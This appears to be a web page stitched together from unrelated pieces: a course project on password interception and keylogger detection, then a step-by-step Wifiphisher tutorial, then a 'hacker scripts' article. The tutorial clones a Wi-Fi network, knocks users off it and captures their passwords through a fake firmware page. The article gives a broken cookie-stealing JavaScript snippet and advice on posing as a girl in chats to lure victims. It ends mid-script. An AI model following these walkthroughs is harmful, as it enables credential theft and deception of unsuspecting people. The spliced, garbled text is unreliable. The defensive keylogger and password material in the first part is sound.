• We collect user passwords using a proxy and a sniffer. Sniffing data in other programs

    Introduction

    You will agree that nowadays it is difficult to imagine computer life without constantly entering passwords. We need a password everywhere: from turning on the computer, registering on various sites and forums and accessing our mailboxes, to creating accounts (pages with personal data and settings) in payment systems and sending or receiving electronic payments. And while for a one-time registration on some random site (for example, just to download a game) you can specify any password without hesitation (even "123456"), when creating a permanent account on an important site (especially one involving money) the password must be very strong. Otherwise the password can be cracked by an attacker, and the personal data obtained can be used to communicate online on your behalf (at best) or to take out loans or open accounts. Therefore it is better to take care of protection in advance and change all your "weak" passwords to more secure ones today.
    The purpose of this course project is to consider methods of intercepting the passwords of computer system users and methods of countering them.

    METHODS FOR INTERCEPTING PASSWORDS AND COUNTERING INTERCEPTION

    Brute force
    Brute force (exhaustive search, the "brute force" method) is one of the popular methods of cracking passwords on servers and in various programs. A cracking program tries to gain access to some service (for example, a mailbox) by trying passwords according to criteria set by the person running it: from a dictionary, by length, by combinations of digits; in principle there are many such criteria.
    The brute-force method is slow but powerful, so it remains in use by hackers to this day, and given the ever-increasing power of computers and the bandwidth of Internet connections, it will remain in use for a long time.
    This method of guessing passwords is attractive because the password is eventually found, but that can take a very, very long time, often centuries. So the method does not always pay off if the owner of the attacked account was careful and did not use simple passwords like "123" or "qwerty", but used both uppercase and lowercase characters together with digits and the permitted special characters. If such a password is also long enough (about 10 characters), it is practically in no danger of being found by brute force.
    With brute force, a dictionary attack is most often used: passwords are taken from a text file containing a pre-compiled (begged for, purchased, stolen or freely downloaded) dictionary. This kind of attack is very effective in the mass compromise of, say, ICQ messenger accounts, when an attacker tries a certain range of ICQ numbers; there is a fairly high probability that a dictionary attack will succeed, and there have been repeated incidents of such account takeovers.
    Since 2005 the number of attacks against SSH services has also increased significantly. Even if your server runs the latest software, that does not mean its password cannot be guessed if the firewall is inactive or configured incorrectly or insufficiently. So, to make guessing harder, configure your firewall properly; this will protect you from unpleasant surprises in the future.
    There are many brute-force programs on the Internet, and also a large number of free and paid dictionaries for them.
    Finally, a little about the mathematical side of brute force.
    As Wikipedia says, any problem in the class NP can be solved by exhaustive search, but this can take exponential time.
    When new cryptographic ciphers are developed, the brute-force method is used to evaluate the cipher's resistance to cracking: a new cipher is considered sufficiently strong if there is no faster way to break it than a complete search of all possible keys. Such attacks are the most effective, but they often take a great deal of time.
    When certain conditions are known, the brute-force method filters out unacceptable values (blank passwords, the same character repeated, and so on). In mathematics this is called the branch and bound method.
    Brute-force methods also lend themselves to parallel computation, where several passwords are tried simultaneously. This is done in two ways: the pipeline method, and searching disjoint subsets of all possible passwords in parallel.

    Figure 1. Windows hardware input model
    When input events occur (key presses, mouse movements), they are processed by the appropriate driver and placed in the system hardware input queue. The system has a special raw input thread, RIT (Raw Input Thread), which retrieves events from the system queue and converts them into messages. The resulting messages are placed at the end of the virtual input queue of one of the threads (a thread's virtual queue is called the VIQ, Virtualized Input Queue). RIT itself works out which thread's queue an event should go to: for mouse events, the thread is determined by finding the window under the mouse cursor; keyboard events are sent to only one thread, the so-called active thread (the thread that owns the window the user is working with). In fact this is not entirely accurate; in particular, Figure 1 shows thread A without a virtual input queue. In that case threads A and B share the same virtual input queue, which is achieved with the AttachThreadInput API function, which allows one thread to attach to another thread's virtual input queue.
    It should be noted that the raw input thread is responsible for processing special keyboard shortcuts, in particular Alt+Tab and Ctrl+Alt+Del.
    Monitoring keyboard input using traps
    This technique is classic for keyloggers. It relies on the operating system's hook mechanism (hooks are also called traps). Hooks allow a program to monitor messages being processed by other programs' windows. Hooks are installed and removed with well-documented API functions of the user32.dll library (SetWindowsHookEx installs a hook, UnhookWindowsHookEx removes it). When installing a hook, you specify the type of messages for which the hook handler should be called; in particular, there are two hook types, WH_KEYBOARD and WH_MOUSE, for logging keyboard and mouse events respectively. A hook can be installed for a given thread or for all threads in the system; a system-wide hook is very convenient for building a keylogger.
    The hook handler code must reside in a DLL, because the system maps the DLL containing the handler into the address space of every GUI process. An interesting detail is that the DLL is mapped not when the hook is set, but when the GUI process receives the first message matching the hook's parameters.
    The hook method is simple and effective, but it has several disadvantages. First, the DLL with the hook is mapped into the address space of all GUI processes, which can be used to detect keyloggers. Second, keyboard events can be logged only for GUI applications, which is easy to verify with the demo program.
    Monitoring keyboard input using keyboard polling
    This technique is based on periodic polling of the keyboard state. To poll the keys, the system provides the GetKeyboardState function, which returns an array of 255 bytes in which each byte holds the state of a specific key. This method no longer requires injecting a DLL into GUI processes, so the spyware is less noticeable.
    However, the key state reported by GetKeyboardState changes only as the thread reads keyboard messages from its queue, so this technique also works only for monitoring GUI applications. The GetAsyncKeyState function is free from this drawback: it returns the state of the key at the moment the function is called.
    The disadvantage of this type of keylogger is the need to poll the keyboard state at a fairly high rate, at least 10-20 polls per second.
    Tracking keyboard input using API function interception
    This technique is not widely used, but it can nevertheless be used to build keyloggers. The difference between a rootkit and a keylogger is small in this case: the spy intercepts functions in order to monitor them, not to modify how they operate or what they return.
    The simplest approach would be to intercept the GetMessage, PeekMessage and TranslateMessage functions of the User32 library, which makes it possible to monitor all messages received by GUI applications.

    Driver-based keylogger
    This method is even more effective than those described above. There are at least two ways to implement it: writing and installing your own keyboard driver in place of the standard one, or installing a filter driver. A filter driver is the more correct approach.

    Hardware keyloggers
    When solving problems of protection against information leakage, only software tools for spying on the user's work are usually considered. However, hardware methods are also possible:
    Installing a tracking device into the keyboard cable break (for example, the device can be made in the form of a PS/2 adapter);
    Embedding a tracking device into the keyboard;
    Reading data by registering PEMIN (spurious electromagnetic radiation and interference);
    Visual observation of the keyboard
    Hardware keyloggers are much rarer than software ones. However, when checking particularly critical computers (for example, those used for banking transactions), the possibility of hardware tracking of keyboard input should not be forgotten.
    Keylogger example
    Currently there are hundreds of keyloggers; as an example, consider the fairly common commercial program ActualSpy (http://www.actualspy.ru; the program dialog box is shown below). The program can log keyboard input (recording the window title and program name), take screenshots on a schedule, log program starts and stops, and monitor the clipboard, the printer and files created by the user. In addition, it monitors Internet connections and visited sites.

    The program has the simplest camouflage: it is not visible in the standard Windows task list. To analyze the collected information, the program generates reports in HTML format. ActualSpy works by means of a hook that records keyboard events.
    Other examples include SpyAgent (http://www.spytech-web.com), ActMon (http://www.actmon.com), SpyBuddy (http://www.actmon.com), PC Activity Monitor (http://www.keyloggers.com), KGB Spy (http://www.refog.ru/) and many more. The list could go on for a long time, but in most cases modern keyloggers have roughly the same basic functionality and differ in auxiliary features and in how well they hide in the system.
    Techniques for finding keyloggers
    1. Search by signatures. This method does not differ from standard virus-scanning techniques. A signature search identifies keyloggers unambiguously; with a correct choice of signatures the probability of error is close to zero. However, a signature scanner can detect only objects already known and described in its database;
    2. Heuristic algorithms. As the name suggests, these search for a keylogger by its characteristic features. Heuristic search is probabilistic. In practice this method is most effective for finding the most common type of keylogger, the hook-based one. However, such methods produce many false positives: there are hundreds of legitimate programs that are not keyloggers but set hooks to monitor keyboard and mouse input. The most common examples are Punto Switcher, the Lingvo dictionary, and software for multimedia keyboards and mice;
    3. Monitoring API functions used by keyloggers. This technique relies on intercepting a number of functions a keylogger uses, in particular SetWindowsHookEx, UnhookWindowsHookEx, GetAsyncKeyState and GetKeyboardState. A call to these functions by any application makes it possible to raise an alarm in time, but the problem of numerous false alarms is the same as with method 2;
    4. Monitoring the drivers, processes and services used by the system. This is a universal technique, applicable not only against keyloggers. In the simplest case, you can use programs such as Kaspersky Inspector or Adinf, which watch for new files appearing in the system.
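
    As an added example (not from the course project or any of the products named above), the following Python code implements the heuristic that follows from the hook section: a hook DLL must be mapped into every GUI process, so a module outside the Windows system directories that appears in almost all processes is a candidate worth examining. The process and module lists are constructed; the optional collector assumes the third-party psutil package, and, as the text notes, candidates still need a look because legitimate hook users show up the same way.

```python
from collections import Counter

# Directories whose DLLs legitimately appear in every process; assumed for this example.
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def shared_module_candidates(process_modules, min_share=0.8, trusted_dirs=TRUSTED_DIRS):
    """process_modules maps a process name to the module paths mapped into it.

    Returns (path, process_count) pairs for modules that sit outside the trusted
    directories and are mapped into at least min_share of the processes, sorted
    by how many processes share them."""
    counts = Counter()
    for modules in process_modules.values():
        for path in {m.lower() for m in modules}:   # count each module once per process
            counts[path] += 1
    total = len(process_modules)
    suspects = [
        (path, n) for path, n in counts.items()
        if total and n / total >= min_share and not path.startswith(trusted_dirs)
    ]
    return sorted(suspects, key=lambda item: (-item[1], item[0]))


def collect_windows_modules():
    """Collect real module lists with psutil (Windows; processes we cannot read are skipped)."""
    import psutil  # third-party package; assumed to be installed
    result = {}
    for proc in psutil.process_iter(["name"]):
        try:
            result[f"{proc.info['name']}:{proc.pid}"] = [m.path for m in proc.memory_maps()]
        except (psutil.AccessDenied, psutil.NoSuchProcess):
            continue
    return result


# Constructed sample: five GUI processes, one DLL from a non-system directory in all of them.
SAMPLE_PROCESSES = {
    "explorer.exe": ["C:\\Windows\\System32\\user32.dll", "C:\\Windows\\System32\\ntdll.dll",
                     "C:\\Tools\\keyhook.dll"],
    "notepad.exe": ["C:\\Windows\\System32\\user32.dll", "C:\\Windows\\System32\\ntdll.dll",
                    "C:\\Tools\\keyhook.dll"],
    "winword.exe": ["C:\\Windows\\System32\\user32.dll", "C:\\Program Files\\Office\\mso.dll",
                    "C:\\Tools\\keyhook.dll"],
    "firefox.exe": ["C:\\Windows\\System32\\user32.dll", "C:\\Program Files\\Firefox\\xul.dll",
                    "C:\\Tools\\keyhook.dll"],
    "calc.exe": ["C:\\Windows\\System32\\user32.dll", "C:\\Tools\\keyhook.dll"],
}

if __name__ == "__main__":
    for path, n in shared_module_candidates(SAMPLE_PROCESSES):
        print(f"{path} is mapped into {n} of {len(SAMPLE_PROCESSES)} processes")
```

    On a real host, pass collect_windows_modules() instead of SAMPLE_PROCESSES and compare the output against the programs the user knowingly runs.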

    Programs for finding and removing keyloggers
    1. Any antivirus product. All antiviruses can detect keyloggers to one degree or another, but a keylogger is not a virus and, as a result, an antivirus is of limited use;
    2. Utilities that implement the signature search mechanism and heuristic search mechanisms. An example is the AVZ utility, which combines a signature scanner and a trap-based keylogger detection system;
    3. Specialized utilities and programs designed to detect keyloggers and block their work. Such programs are most effective for detecting and blocking keyloggers, since they can usually block almost all types of keyloggers.

    Among specialized programs, the commercial products PrivacyKeyboard and Anti-keylogger (http://www.bezpeka.biz/) may be of interest. The interface of the Anti-keylogger program is shown in the figure:

    The Anti-keylogger program runs in the background and detects programs suspected of tracking the keyboard. If necessary, you can manually unblock any of the detected programs (for example, the figure shows that MSCTF and the download manager FlashGet were included in the list of "spyware"). Signature databases are not used; detection is carried out by heuristic methods.
    Testing showed that the program effectively counters keyloggers based on hooks, cyclic polling and a keyboard filter driver.
    Another example is the AdvancedAntiKeylogger program (http://www.anti-keylogger.net; an example of the program is shown below).

    In training mode this program behaves like a firewall: when suspicious activity is detected, a warning is shown with the name and description of the program. The user can choose an action for the session (allow or deny) or create a permanent rule for the application. During testing, AdvancedAntiKeylogger confidently detected all the main types of keyloggers (hook-based, cyclic polling and filter driver). The program's settings are protected by a password specified during installation.

    Conclusion
    A keylogger is not a virus, but it nevertheless poses a great threat to users, because it allows an attacker to monitor the user's work and can be used to steal confidential information, including passwords. The danger increases significantly when a keylogger is combined with rootkit technology that masks its presence. Even more dangerous is a Trojan or backdoor that contains a keylogger: its presence significantly expands the Trojan's capabilities and the danger to the user.

    Conclusion

    After studying the material, you can draw some conclusions:
    1. The password should not be short.
    A password shorter than 8 characters is generally undesirable, and it is better still if it contains 10-12 characters or more.
    2. The password should not consist only of digits or only of letters (especially repeating ones). It is best when letters and digits alternate, and better still if special characters or punctuation marks are added.
    3. Do not use a password that contains any data about you or your family: memorable dates (births, weddings, etc.), first and last names of relatives, apartment, document or telephone numbers. Combinations made from personal data are just as unacceptable.
    4. The password should be meaningless, so avoid any existing dictionary word (in any language).
    5. Do not use "secret questions" whose answers can easily be found out or guessed.
    6. Use a unique password for each individual Internet service, forum and site.
    7. Do not keep passwords in plain sight.
    8. Do not store passwords on the Internet or on your computer as a text file.
    If an attacker gains access to your computer, a password file will be all the easier to find (wherever it is on the hard drive).
    9. Do not store passwords with the browser's built-in "password saver".
    First, you can never be sure of the reliability of such a "keeper" or that the browser itself has no "holes" in its protection; attackers look for "holes" in browsers first of all, because everyone uses browsers.
    Second, if the browser or the whole system fails, there is a very high probability of losing access to all the passwords the browser stores, and although that is not hacking, it is unpleasant too.
    10. Make copies of passwords.
    If you use special software to store passwords, do not forget to make periodic backup copies of your password databases. If you keep passwords on paper, make a second copy of the sheet (or notepad) and store the original and the duplicate in different (secluded) places.
    11. Do not enter passwords in third-party programs or on third-party sites, and do not send passwords by mail (even at the request of the support service or site administration). The administration of a REAL serious site will never ask for your password, so such a request is most likely the work of scammers.
    12. Enter passwords on other people's computers as rarely as possible, especially in public places (Internet cafes, terminals, etc.). It is highly undesirable to enter passwords on someone else's computer to log into a payment system or Internet banking, because that computer may contain a device or program that records the sequence of keystrokes (a keylogger).
    13. Change passwords periodically (especially if you used the password on someone else's computer). The stronger the password, the longer you can use it; a strong password of 12-14 characters, composed according to the recommendations above, need not be changed for several years.
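
    As an added example (not part of the course project), the following Python code applies the recommendations above (length, mixed character classes, no repeated characters, no dictionary words, no personal data) and, for the brute-force section earlier, estimates the worst-case time of an exhaustive search over the alphabet a password actually uses. The special-character set, the small sample dictionary and the guess rate are assumptions.

```python
import re

# Character classes the recommendations refer to; the special set is an assumption.
LOWER = "abcdefghijklmnopqrstuvwxyz"
UPPER = LOWER.upper()
DIGITS = "0123456789"
SPECIAL = "!@#$%^&*()-_=+[]{};:,.<>?/"

# Constructed sample dictionary; a real check would load a full wordlist.
SAMPLE_DICTIONARY = {"password", "qwerty", "letmein", "dragon", "monkey", "welcome"}

SECONDS_PER_YEAR = 365 * 24 * 3600


def alphabet_size(password):
    """Size of the alphabet an exhaustive search must cover for this password."""
    size = 0
    if any(c in LOWER for c in password):
        size += len(LOWER)
    if any(c in UPPER for c in password):
        size += len(UPPER)
    if any(c in DIGITS for c in password):
        size += len(DIGITS)
    if any(c not in LOWER + UPPER + DIGITS for c in password):
        size += len(SPECIAL)
    return size


def keyspace(password):
    """Number of candidates a complete search over that alphabet and length must try."""
    return alphabet_size(password) ** len(password)


def years_to_exhaust(password, guesses_per_second=1e9):
    """Worst-case search time in years; the guess rate is an assumed attacker capability."""
    return keyspace(password) / guesses_per_second / SECONDS_PER_YEAR


def check_password(password, personal_tokens=(), dictionary=SAMPLE_DICTIONARY):
    """Return the list of recommendations above that the password violates."""
    problems = []
    if len(password) < 8:
        problems.append("shorter than 8 characters")
    elif len(password) < 10:
        problems.append("shorter than the recommended 10-12 characters")
    if password.isdigit():
        problems.append("digits only")
    if password.isalpha():
        problems.append("letters only")
    if re.search(r"(.)\1{2,}", password):
        problems.append("same character repeated three or more times in a row")
    if password.lower() in dictionary:
        problems.append("dictionary word")
    for token in personal_tokens:  # names, dates, phone numbers the user supplies
        if token and token.lower() in password.lower():
            problems.append("contains personal data: " + token)
    return problems


if __name__ == "__main__":
    for pw in ("123456", "qwerty", "Ivanov1985", "rT7$kq!2Lm9p"):
        print(pw, check_password(pw, personal_tokens=("Ivanov", "1985")),
              "worst case %.1e years" % years_to_exhaust(pw))
```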


    But some readers complain that cracking WPA2 takes too much time and that WPS is not enabled on all access points (in my opinion there are still quite a lot of access points with WPS). To help you in such situations, I will describe a virtually guaranteed way to get the Wi-Fi password without any cracking, using Wifiphisher.

    Stages of the Wifiphisher strategy

    The idea is to create an evil twin of the access point and then deauthenticate the user from the original one (a DoS attack also works for this). After reconnecting, he ends up on your fake access point with the same SSID and sees a plausible-looking web page asking for the password because of a "firmware update". Once the password is entered, you intercept it and let him use the evil twin as the real access point without suspecting anything. Great plan!

    So Wifiphisher does the following:

  • Kicks the user from the real access point.
  • Allows him to log into your fake access point.
  • Shows the user a web page notifying that the “firmware update” has been successful and that they need to re-enter their credentials.
  • Gives the hacker the Wi-Fi password, while the unsuspecting user continues to surf the Internet in peace.
    Such scripts are nothing new; take Airsnarf, for example. But Wifiphisher stands out from them in its sophistication. This automated script greatly simplifies the work, though if you wish you can always perform the above steps manually.
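
    As an added example (not part of Wifiphisher or this article), the following Python code shows what the defender side of this scenario can watch for: the same SSID suddenly served by a second BSSID with a different security type, and a burst of deauthentication frames carrying one access point's address. The scan results and frame log are constructed; the SSID wonderhowto is the one the article uses later, and the BSSIDs are made up.

```python
from collections import defaultdict


def find_evil_twins(scan, known=None):
    """scan: one dict per observed access point with keys ssid, bssid, security.

    With a known map {ssid: {legitimate bssids}}, any other BSSID advertising a
    known SSID is reported. Without it, an SSID served both by a secured and by
    an open BSSID is reported with its open BSSIDs, which is what a cloned SSID
    with a captive "firmware update" page looks like in a scan."""
    by_ssid = defaultdict(list)
    for ap in scan:
        by_ssid[ap["ssid"]].append(ap)
    alerts = {}
    for ssid, aps in by_ssid.items():
        if known is not None:
            if ssid in known:
                rogue = sorted(ap["bssid"] for ap in aps if ap["bssid"] not in known[ssid])
                if rogue:
                    alerts[ssid] = rogue
            continue
        secured = [ap for ap in aps if ap["security"] != "open"]
        open_aps = [ap for ap in aps if ap["security"] == "open"]
        if secured and open_aps:
            alerts[ssid] = sorted(ap["bssid"] for ap in open_aps)
    return alerts


def deauth_bursts(frames, window_seconds=10.0, threshold=20):
    """frames: (timestamp, frame_type, bssid) tuples from a monitor-mode capture.

    Returns {bssid: count} for addresses that sent at least threshold
    deauthentication frames within any window_seconds-long window; a normal
    access point sends a handful of these, a forced disconnect sends dozens."""
    times = defaultdict(list)
    for ts, ftype, bssid in frames:
        if ftype == "deauth":
            times[bssid].append(ts)
    bursts = {}
    for bssid, stamps in times.items():
        stamps.sort()
        start, best = 0, 0
        for end in range(len(stamps)):
            while stamps[end] - stamps[start] > window_seconds:  # slide the window start
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            bursts[bssid] = best
    return bursts


# Constructed scan: the real wonderhowto AP (WPA2) and an open clone with the same SSID.
SAMPLE_SCAN = [
    {"ssid": "wonderhowto", "bssid": "aa:bb:cc:dd:ee:01", "security": "wpa2"},
    {"ssid": "wonderhowto", "bssid": "aa:bb:cc:dd:ee:02", "security": "open"},
    {"ssid": "homenet", "bssid": "aa:bb:cc:dd:ee:10", "security": "wpa2"},
]

# Constructed capture: 25 deauth frames carrying the real AP's address within five
# seconds, ordinary data frames, and two isolated deauths from another AP.
SAMPLE_FRAMES = [(100.0 + i * 0.2, "deauth", "aa:bb:cc:dd:ee:01") for i in range(25)]
SAMPLE_FRAMES += [(100.0 + i, "data", "aa:bb:cc:dd:ee:10") for i in range(30)]
SAMPLE_FRAMES += [(100.0, "deauth", "aa:bb:cc:dd:ee:10"), (900.0, "deauth", "aa:bb:cc:dd:ee:10")]

if __name__ == "__main__":
    print("possible evil twins:", find_evil_twins(SAMPLE_SCAN))
    print("deauth bursts:", deauth_bursts(SAMPLE_FRAMES))
```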

    To achieve your goal, you will need two wireless adapters, one of which must be capable of packet injection. In this case, I used the model. You can choose other adapters, but before you do, make sure they are compatible with Kali and support packet injection. Please don't complain that nothing works for you until you have tested your wireless adapter and made sure it is capable of packet injection. Most models do not have this feature.

    Well now, let's take a look at Wifiphisher.

    Step 1: Download Wifiphisher

    To get started, launch Kali and open a terminal. Then download the Wifiphisher archive and unpack the code.

    Kali > tar -xvzf /root/wifiphisher-1.1.tar.gz

    In the screenshot below you can see that I have extracted the Wifiphisher source code.

    Alternatively, you can copy the code from GitHub by running the following command:

    Kali > git clone https://github.com/sophron/wifiphisher

    Step 2: Open the utility directory

    Kali > cd wifiphisher-1.1

    Looking through the contents of this directory, you will see the wifiphisher.py script there.

    Kali > ls -l

    Step 3: Run the script

    You can run the Wifiphisher script using this command:

    Kali > python wifiphisher.py

    Please note that before the name of the script I put the name of the interpreter - python.

    The first time you run it, the script will most likely tell you that “hostapd” was not found and will prompt you to install it. To begin installing hostapd, enter "y" (yes).

    Once the installation is complete, run the Wifiphisher script again.

    Kali > python wifiphisher.py

    This time it will start a web server on ports 8080 and 443 and then search for all available Wi-Fi networks.

    After this, you will see a list of all detected Wi-Fi networks on the screen. In my example, the utility found a network called "wonderhowto". It will become the target of our attack.

    Step 4: Launch the attack and get the password

    Press Ctrl+C on your keyboard and the application will ask you to enter the number of the access point you want to attack. In my case this is point number 12.

    After pressing Enter, Wifiphisher will show you the page that you can see in the screenshot below. This means that the interface is now in use, the SSID is being cloned and the selected access point is being attacked.

    The user will be disconnected from their access point. When reconnecting, they will be directed to ours.

    Once this happens, the proxy on the web server will intercept the request and present the user with a fake login page informing them that they have installed a new version of the router firmware and need to re-authenticate.

    As you can see, I entered my password (nullbyte) and clicked Submit.

    When the user enters their password, it will be shown to you in the open Wifiphisher terminal. The utility then lets the user access the Internet through your system so that he suspects nothing.

    Now you can get even the most complex Wi-Fi password! Don’t forget to come back to us from time to time for new interesting articles on various hacking techniques!

    Hacker PHP Scripts. JS. PERL.
    Scripts for stealing passwords
    So, in this article I will tell you how a password and all sorts of interesting information can be obtained through a website. All a hacker needs is his own page on the Internet, which you will either visit yourself or be lured to. Wandering around the Internet, I hear more and more bad reviews of social engineering. If you are not interested in hacking methods based on social engineering, or it all seems like baby talk to you, click the cross in the corner of your browser and forget that this article exists. Nowadays it is not enough just to understand system code and all sorts of programming matters; you also need to be able to communicate with people. Many hackers break into banks, computers and databases not only by finding vulnerabilities in the security system, but also by using social engineering at every turn, because a hacker is not only the one who broke the system, but also the one who, through communication, often gains access to the most interesting places on the Internet. It is enough to recall the famous hacker Mitnick, who broke through a bank's security using precisely that social engineering. First I will explain how ordinary users are hacked, and then a more global hack, for example of some company. Imagine that a hacker pays a considerable amount for Internet access and starts thinking about how to make it free, or he is not allowed into some resource on the network without a password, and you have what he needs. To begin with, he creates a page on the Internet and on one of its pages plants code something like this:

    var cook=show_all_cookies();
    document.open("cookies",cook);
    document.write("
    document.close("cookies");

    (The script was slightly changed for security reasons.) Now all that remains is to lure the victim to the site, where a window will pop up saying "Good day"; after clicking OK, your cookies are sent to the attacker, and they contain a lot of interesting things, from your IP address to passwords for the services you use.

    A simple study of cookies can reveal quite a lot of interesting information. All the attacker risks is exposing his e-mail address, but since there are so many free mailboxes now, this is not very dangerous. Typically a mailbox is created to carry out the attack and then deleted or abandoned so that the attacker can no longer be found. Alternatively, you can put this script in a file with the .js extension and include it on the site; in that case the mailbox is not exposed at all.

    How do you lure a victim to your site? There are countless ways: for example, you go into a chat and pick a victim; after chatting a little you need to win her favour, and it is best if the victim is of the opposite sex to you. Practice shows that it is best to be represented in the chat by a girl, so choose a nickname that characterizes you as a girl (and watch what you write: do not give yourself away with word endings; if you pretended to be a girl, then be one). Everyone understands that everyone will talk to a girl. Remember that it is better not to pressure the victim but, for example, to ask "do you have a photo? Mine is at http://your site.ru, go and look if you want". Every guy will want to know what his interlocutor looks like, and as soon as he lands on your page, you go into the mailbox and take his cookies from there. That is all; now you just need to rummage through them and you will find almost everything you want. In the same way you can find out the IP address of a person who uses proxy servers, and knowing the IP you can check it for shared resources, carry out a DoS attack or just childishly throw him out of the chat. You can also simply play pranks using the site, for example with this script:

    for(I=1 ; I